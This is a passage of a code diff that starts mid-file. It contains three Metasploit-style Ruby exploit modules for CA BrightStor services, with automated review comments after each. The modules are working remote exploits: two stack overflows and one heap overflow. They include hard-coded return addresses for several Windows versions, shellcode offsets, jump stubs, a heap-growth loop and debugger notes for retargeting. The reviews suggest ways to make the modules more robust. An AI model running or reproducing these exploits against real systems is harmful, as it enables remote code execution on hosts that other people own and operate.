request is sent to UDP port 41524, triggering a stack
overflow.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '13613'],
[ 'BID', '12491'],
[ 'CVE', '2005-0260'],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities'],
[ 'MIL', '14'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 2048,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[
'cheyprod.dll 12/12/2003',
{
'Platform' => 'win',
'Ret' => 0x23808eb0, # call to edi reg
},
],
],
'DisclosureDate' => 'Dec 20 2004',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(41524)
], self)
end
def check
# The first request should have no reply
csock = Rex::Socket::Tcp.create(
'PeerHost' => datastore['RHOST'],
'PeerPort' => 41523,
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self,
})
csock.put('META')
x = csock.get_once(-1, 3)
csock.close
# The second request should be replied with the host name
csock = Rex::Socket::Tcp.create(
'PeerHost' => datastore['RHOST'],
'PeerPort' => 41523,
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self,
})
csock.put('hMETA')
y = csock.get_once(-1, 3)
csock.close
if (y and not x)
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit
connect_udp
buf = 'X' * 4096
# esp @ 971
# ret @ 968
# edi @ 1046
# end = 4092
buf[968, 4] = [ target.ret ].pack('V')
buf[1046, payload.encoded.length] = payload.encoded
udp_sock.put(buf)
udp_sock.recvfrom()
handler
disconnect_udp
end
end
end
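Review bot: `check` hard-codes TCP port 41523 in both probes while `RPORT` defaults to UDP 41524, and nothing says why the fingerprint deliberately uses a different port and transport than the exploit; a comment such as `# Fingerprint the discovery service via its TCP listener (41523); RPORT is the UDP target and is intentionally not used here` above the first `Rex::Socket::Tcp.create` would stop a later maintainer "correcting" it to `datastore['RPORT']`. As in the Perl `Check` it replaces (which mapped `$s->IsError` to a Connect check code), a refused TCP connect should yield a check code rather than an exception, so a `begin … rescue ::Exception; return Exploit::CheckCode::Safe; end` around the probes is worth adding — presumably `Rex::Socket::Tcp.create` raises on failure, confirm. `udp_sock.recvfrom()` is called with no explicit timeout; if Rex's default read timeout is unbounded the module could hang after a datagram that crashes the service without replying, so verify that default or pass one explicitly.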


@ -0,0 +1,100 @@
require 'msf/core'
module Msf
class Exploits::Windows::Brightstor::BrightstorSQLAgentOverflow < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor Agent for Microsoft SQL Overflow',
'Description' => %q{
This module exploits a vulnerability in the CA BrightStor
Agent for Microsoft SQL Server. This vulnerability was
discovered by cybertronic[at]gmx.net.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2005-1272'],
[ 'BID', '14453'],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=287&type=vulnerabilities'],
[ 'URL', 'http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239'],
[ 'MIL', '83'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
# This exploit requires a jmp esp for return
['ARCServe 11.0 Asbrdcst.dll 12/12/2003', { 'Platform' => 'win', 'Ret' => 0x20c11d64 }], # jmp esp
['ARCServe 11.1 Asbrdcst.dll 07/21/2004', { 'Platform' => 'win', 'Ret' => 0x20c0cd5b }], # push esp, ret
['ARCServe 11.1 SP1 Asbrdcst.dll 01/14/2005', { 'Platform' => 'win', 'Ret' => 0x20c0cd1b }], # push esp, ret
# Generic jmp esp's
['Windows 2000 SP0-SP3 English', { 'Platform' => 'win', 'Ret' => 0x7754a3ab }], # jmp esp
['Windows 2000 SP4 English', { 'Platform' => 'win', 'Ret' => 0x7517f163 }], # jmp esp
['Windows XP SP0-SP1 English', { 'Platform' => 'win', 'Ret' => 0x71ab1d54 }], # push esp, ret
['Windows XP SP2 English', { 'Platform' => 'win', 'Ret' => 0x71ab9372 }], # push esp, ret
['Windows 2003 SP0 English', { 'Platform' => 'win', 'Ret' => 0x71c03c4d }], # push esp, ret
['Windows 2003 SP1 English', { 'Platform' => 'win', 'Ret' => 0x71c033a0 }], # push esp, ret
],
'DisclosureDate' => 'Aug 02 2005',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(6070)
], self)
end
def exploit
# The 'one line' request does not work against Windows 2003
1.to(5) { |i|
# Flush some memory
connect
begin
sock.put("\xff" * 0x12000)
sock.get_once
rescue
end
disconnect
# 3288 bytes max
# 696 == good data (1228 bytes contiguous) @ 0293f5e0
# 3168 == return address
# 3172 == esp @ 0293ff8c (2476 from good data)
buf = Rex::Text.rand_text_english(3288, payload_badchars)
buf[ 696, payload.encoded.length ] = payload.encoded
buf[3168, 4] = [target.ret].pack('V') # jmp esp
buf[3172, 5] = "\xe9\x4f\xf6\xff\xff" # jmp -2476
connect
begin
sock.put(buf)
sock.get_once
rescue
end
handler
disconnect
}
end
end
end
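Review bot: `1.to(5) { |i| … }` in `exploit` is not a method Ruby's Integer provides, so the method raises NoMethodError before the first connection is made; use `1.upto(5) { |i|` or, since `i` is never read inside the block, simply `5.times {`. The two bare `rescue` clauses around `sock.put`/`sock.get_once` deliberately swallow send errors, which is acceptable for a best-effort loop, but `connect` sits outside both `begin` blocks, so if the agent dies after an early iteration the next `connect` presumably raises and ends the loop — a comment like `# connect raises if the agent has already crashed, which ends the loop` would make that intentional-looking behaviour explicit. `handler` is also invoked on every iteration rather than once after the loop, presumably so a session is picked up after whichever iteration succeeds; that too deserves a one-line comment.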


@ -0,0 +1,162 @@
require 'msf/core'
module Msf
class Exploits::Windows::Brightstor::BrightstorUniversalAgentOverflow < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor Universal Agent Overflow',
'Description' => %q{
This module exploits a convoluted heap overflow in the CA
BrightStor Universal Agent service. Triple userland
exception results in heap growth and execution of
dereferenced function pointer at a specified address.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'MIL', '16'],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities'],
],
'Privileged' => true,
'Payload' =>
{
# 250 bytes of space (bytes 0xa5 -> 0xa8 = reversed)
'Space' => 164,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[
'Magic Heap Target #1',
{
'Platform' => 'win',
'Ret' => 0x01625c44, # We grow to our own return address
},
],
],
'DisclosureDate' => '',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(6050)
], self)
end
def check
connect
probe = "\x00\x00\x00\x00\x03\x20\xbc\x02" +
("2" * 256) +
("A" * 32) +
"\x0B\x11\x0B\x0F\x03\x0E\x09\x0B" +
"\x16\x11\x14\x10\x11\x04\x03\x1C" +
"\x11\x1C\x15\x01\x00\x06" +
("X" * 390)
sock.put(probe)
resp = sock.get_once
disconnect
if (resp and resp == "\x00\x00\x73\x02\x32\x32\x00\x00")
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
# The server reverses four bytes starting at offset 0xa5 :0
# Create the overflow string
boom = 'X' * 1024
# Required field to trigger the fault
boom[248, 2] = [1000].pack('V')
# The shellcode, limited to 250 bytes (no nulls)
boom[256, payload.encoded.length] = payload.encoded
# This should point to itself
boom[576, 4] = [target.ret].pack('V')
# This points to the code below
boom[580, 4] = [target.ret + 8].pack('V')
# We have 95 bytes, use it to hop back to shellcode
boom[584, 6] = "\x68" + [target.ret - 320].pack('V') + "\xc3"
# Stick the protocol header in front of our request
req = "\x00\x00\x00\x00\x03\x20\xa8\x02" + boom
# We keep making new connections and triggering the fault until
# the heap is grown to encompass our known return address. Once
# this address has been allocated and filled, each subsequent
# request will result in our shellcode being executed.
1.upto(200) {|i|
connect
print_status("Sending request #{i} of 200...") if (i % 10) == 0
sock.put(req)
disconnect
# Give the process time to recover from each exception
select(nil, nil, nil, 0.1);
}
handler
end
end
end
__END__
012a0d91 8b8e445c0000 mov ecx,[esi+0x5c44]
012a0d97 83c404 add esp,0x4
012a0d9a 85c9 test ecx,ecx
012a0d9c 7407 jz ntagent+0x20da5 (012a0da5)
012a0d9e 8b11 mov edx,[ecx] ds:0023:41327441=???????
012a0da0 6a01 push 0x1
012a0da2 ff5204 call dword ptr [edx+0x4]
Each request will result in another chunk being allocated, the exception
causes these chunks to never be freed. The large chunk size allows us to
predict the location of our buffer and grow our buffer to where we need it.
If these addresses do not match up, run this exploit, then attach with WinDbg:
> s 0 Lfffffff 0x44 0x5c 0x61 0x01
Figure out the pattern, replace the return address, restart the service,
and run it through again. Only tested on WinXP SP1
011b5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
011c5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
011d5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
011e5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
011f5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01205c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
[ snip ]
01605c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01615c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01625c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01635c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01645c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01655c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01665c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01675c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01685c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01695c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
016a5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
016b5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
016c5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
016d5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01725c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
017e5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
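Review bot: The comment above `boom[256, payload.encoded.length] = payload.encoded` says the shellcode is "limited to 250 bytes (no nulls)", but the Payload block declares `'Space' => 164`, so one of the two is stale; reading the two reversal comments together it looks like 164 was chosen so the encoded payload ends before the four bytes the server reverses at offset 0xa5, and the inline comment should say that instead, e.g. `# The shellcode; Space is 164 so it ends before the four bytes the server reverses at 0xa5 (see the Payload block)`. `'DisclosureDate' => ''` is left empty while the sibling module in this commit carries one, and the References hold only the MIL and iDefense URL entries, so the date should be filled in from the referenced advisory rather than shipped blank. The `__END__` notes state "Only tested on WinXP SP1" and that `'Ret'` is a heap address the user may have to re-derive with a debugger, yet the only target is named 'Magic Heap Target #1' with `'Platform' => 'win'`, so that caveat belongs in the target name or the Description where someone selecting the target will actually see it. The trailing semicolon on `select(nil, nil, nil, 0.1);` is a stray C-ism the rest of the file does not use.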